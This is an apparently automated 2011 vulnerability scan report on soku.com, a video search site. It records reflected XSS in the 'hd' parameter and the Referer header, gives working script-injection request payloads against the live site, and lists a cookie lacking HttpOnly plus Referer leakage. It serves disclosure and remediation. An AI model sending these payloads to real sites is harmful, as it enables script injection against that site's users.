XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, soku.com Report generated by XSS.CX  at Fri Aug 19 11:49:50 GMT-06:00 2011. Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search 
     XSS Home   |  XSS Crawler   | SQLi Crawler   | HTTPi Crawler   | FI Crawler   | Loading
1. Cross-site scripting (reflected) 
  
1.1. http://www.soku.com/v [hd parameter] 
1.2. http://www.soku.com/v [hd parameter] 
1.3. http://www.soku.com/v [Referer HTTP header] 
2. Cookie without HttpOnly flag set 
3. Cross-domain Referer leakage 
3.1. http://www.soku.com/v 
3.2. http://www.soku.com/v 
3.3. http://www.soku.com/v 
3.4. http://www.soku.com/v 
4. Cross-domain script include 
4.1. http://www.soku.com/ 
4.2. http://www.soku.com/v 
5. Content type incorrectly stated 
1. Cross-site scripting (reflected) 
 next 
There are 3 instances of this issue: 
Issue background 
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. 
Issue remediation 
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).  
1.1. http://www.soku.com/v [hd parameter] 
 next 
Summary 
Severity:   
High  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The value of the hd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd569"><script>alert(1)</script>992396d4f01   was submitted in the hd parameter. This input was echoed unmodified in the application's response. 
Request 
GET /v?keyword=xss&hd=dd569"><script>alert(1)</script>992396d4f01   HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.36k2q4PROiJht     
Response 
HTTP/1.0 200 OK/title>...[SNIP]... dd569"><script>alert(1)</script>992396d4f01  &time_length=0" target="_self">...[SNIP]...   
1.2. http://www.soku.com/v [hd parameter] 
 previous 
 next 
Summary 
Severity:   
High  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The value of the hd request parameter is copied into the name of an HTML tag. The payload fa769><script>alert(1)</script>bc705f85e41   was submitted in the hd parameter. This input was echoed unmodified in the application's response. 
Request 
GET /v?keyword=xss&hd=%22%3E%3CSCRIPT%3Edocument.title=1313775822796041%3C/SCRIPT%3E%3C%22fa769><script>alert(1)</script>bc705f85e41   HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.36k2q4PROiJht        
Response 
HTTP/1.0 200 OK/title>...[SNIP]... fa769><script>alert(1)</script>bc705f85e41  &time_length=0" target="_self">...[SNIP]...   
1.3. http://www.soku.com/v [Referer HTTP header] 
 previous 
 next 
Summary 
Severity:   
Low  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f114e"-alert(1)-"319ad3d3a0a   was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. 
Remediation detail 
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.  
Request 
GET /v?keyword=xss HTTP/1.1/search?hl=en&q=f114e"-alert(1)-"319ad3d3a0a  /xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3     
Response 
HTTP/1.0 200 OK/title>...[SNIP]... .com/search?hl=en&q=f114e"-alert(1)-"319ad3d3a0a  "/>...[SNIP]...    
2. Cookie without HttpOnly flag set 
 previous 
 next 
Summary 
Severity:   
Low  
Confidence:   
Firm  
Host:   
http://www.soku.com  
Path:   
/N  
Issue detail 
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=abcbRX79vDfJUe2cLjJht; path=/   
Issue background 
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script. 
Issue remediation 
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. 
Request 
GET /N HTTP/1.1 
Response 
HTTP/1.0 404 Not FoundSet-Cookie: JSESSIONID=abcbRX79vDfJUe2cLjJht; path=/  ......... ...... ............</title>...[SNIP]...   
3. Cross-domain Referer leakage 
 previous 
 next 
There are 4 instances of this issue: 
Issue background 
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. 
Issue remediation 
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties. 
3.1. http://www.soku.com/v 
 previous 
 next 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The page was loaded from a URL containing a query string:http://www.soku.com/v?keyword=xss&hd=%22%3E%3CSCRIPT%3Ealert(document.location)%3C/SCRIPT%3E%3C%22     http://g1.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE    http://g2.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5    http://g2.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A    http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26    http://g3.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF    http://g3.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E    http://g3.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6    http://lstat.youku.com/urchin.js  http://v.blog.sohu.com/u/vw/1740891  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html  http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html  http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html  http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html  http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html  http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99   http://www.youku.com/ http://www.youku.com/youku/help/question_play.shtml    
Request 
GET /v?keyword=xss&hd=%22%3E%3CSCRIPT%3Ealert(document.location)%3C/SCRIPT%3E%3C%22 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.766Z4dZ4yjJht        
Response 
HTTP/1.0 200 OK/title>...[SNIP]... <a href="http://www.youku.com" target="_blank">  <span class="logoyouku_sl">...[SNIP]... <a href="http://www.youku.com/youku/help/question_play.shtml#java" target="_blank">   ...............</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68'>   </a>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1">     </a></li><img alt="...............458" src="http://g2.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A" >    </li>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1"  >     ...............458</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219'>   </a>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2">    </a></li><img alt="xss......  ........." src="http://g3.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF" >    </li>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115'>   </a>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3">    </a></li><img alt="XSS Shell Demo" src="http://g3.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E" >    </li>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82'>   </a>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4">    </a></li><img alt="4.6XSS ......3.........." src="http://g2.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5" >    </li>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4"  >    4.6<span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149'>   </a>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5">    </a></li><img alt="Konakart 2.2.6.0 stored XSS explitation with BeEF" src="http://g3.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6" >    </li>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5"  >    Konakart 2.2.6.0 stored <span class="highlight">...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6">   </a></li><img alt="......028" src="http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26" >    </li>...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6"  >   ......028</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990'>   </a>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7">     </a></li><img alt="<script>alert(xss)<script>" src="http://g1.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE" >     </li>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7"  >     <script>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
3.2. http://www.soku.com/v 
 previous 
 next 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The page was loaded from a URL containing a query string:http://www.soku.com/v?keyword=xss&hd=%22%3E%3CSCRIPT%3Edocument.title=1313775822796041%3C/SCRIPT%3E%3C%22     http://g1.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF    http://g1.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5    http://g2.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A    http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26    http://g3.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE    http://g3.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E    http://g3.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6    http://lstat.youku.com/urchin.js  http://v.blog.sohu.com/u/vw/1740891  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html  http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html  http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html  http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html  http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html  http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99   http://www.youku.com/ http://www.youku.com/youku/help/question_play.shtml    
Request 
GET /v?keyword=xss&hd=%22%3E%3CSCRIPT%3Edocument.title=1313775822796041%3C/SCRIPT%3E%3C%22 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.36k2q4PROiJht        
Response 
HTTP/1.0 200 OK/title>...[SNIP]... <a href="http://www.youku.com" target="_blank">  <span class="logoyouku_sl">...[SNIP]... <a href="http://www.youku.com/youku/help/question_play.shtml#java" target="_blank">   ...............</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68'>   </a>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1">     </a></li><img alt="...............458" src="http://g2.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A" >    </li>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1"  >     ...............458</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219'>   </a>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2">    </a></li><img alt="xss......  ........." src="http://g1.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF" >    </li>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115'>   </a>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3">    </a></li><img alt="XSS Shell Demo" src="http://g3.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E" >    </li>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82'>   </a>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4">    </a></li><img alt="4.6XSS ......3.........." src="http://g1.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5" >    </li>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4"  >    4.6<span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149'>   </a>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5">    </a></li><img alt="Konakart 2.2.6.0 stored XSS explitation with BeEF" src="http://g3.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6" >    </li>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" 